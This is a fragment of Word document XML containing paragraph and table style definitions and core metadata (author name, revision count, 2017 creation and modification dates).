  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="Standard"/>
    <w:rsid w:val="00CE13C0"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00CE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Lim</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Gerald Lim</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-18T11:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-05T08:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>